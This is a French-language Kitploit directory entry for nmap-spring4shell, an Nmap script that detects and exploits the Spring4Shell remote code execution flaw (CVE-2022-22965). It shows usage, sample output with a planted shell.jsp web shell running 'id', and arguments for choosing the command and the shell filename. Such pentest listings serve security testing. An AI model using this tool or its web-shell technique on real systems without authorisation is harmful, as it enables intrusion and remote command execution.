Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
nmap-spring4shell — Script NSE Nmap pour détecter et exploiter la vulnérabilité RCE Spring4Shell (CVE-2022-22965) dans les services HTTP avec injection de charge utile configurable et exécution de commandes. | Kitploit
Outils/GitHubGitHub/gpiechnik2/nmap-spring4shell
ReconnaissanceScanners de VulnérabilitésExploitationExploitation d'Applications WebCollecte d'InformationsTests d'Intrusion
GitHubgpiechnik2/nmap-spring4shell

nmap-spring4shell

Script NSE Nmap pour détecter et exploiter la vulnérabilité RCE Spring4Shell (CVE-2022-22965) dans les services HTTP avec injection de charge utile configurable et exécution de commandes.

Voir le dépôt
841il y a 4 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Nmap-spring4shell

Log4shell-nmap est un script NSE pour détecter les vulnérabilités RCE Spring4Shell (CVE-2022-22965) dans les services HTTP. Le script injecte la charge utile correcte dans l'application et exécute ensuite la commande suivante sur le point de terminaison spécifié.

Vulnérabilité

Voir ici.

Utilisation

root@kitploit:~
┌──(kali㉿kali)-[~/nmap-spring4shell]
└─$ nmap 127.0.0.1 --script=./spring4shell.nse
(...)
PORT     STATE SERVICE    REASON  VERSION
8080/tcp open  http-proxy syn-ack
| spring4shell: 
|   VULNERABLE:
|   Spring4Shell - Spring Framework RCE via Data Binding on JDK 9+
|     State: VULNERABLE
|     IDs:  CVE:CVE-2022-22965
|     Check results:
|       127.0.0.1:8080/shell.jsp?pwd=j&cmd=id
|     Extra information:
|       TESTED URL: 127.0.0.1:8080
|       COMMAND: id
|       ASSERTION: uid
|     References:
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22965

Arguments

Nous pouvons utiliser plusieurs variables dans le script. Voici la liste :

  • endpoint - URL relative. Sur https://bugspace.pl/search/videos ce sera /search/videos,
  • command - commande à exécuter sur le serveur. La commande par défaut est id,
  • assertion - chaîne vérifiée dans la réponse du serveur. L'assertion par défaut est uid,
  • filename - nom du fichier sur le serveur. Pour plus d'informations, voir ici. Le nom par défaut est shell.

Données complémentaires

Testé sur l'application provenant de ici et de ici

Licence

Identique à Nmap. Voir https://nmap.org/book/man-legal.html

Télécharger l’outil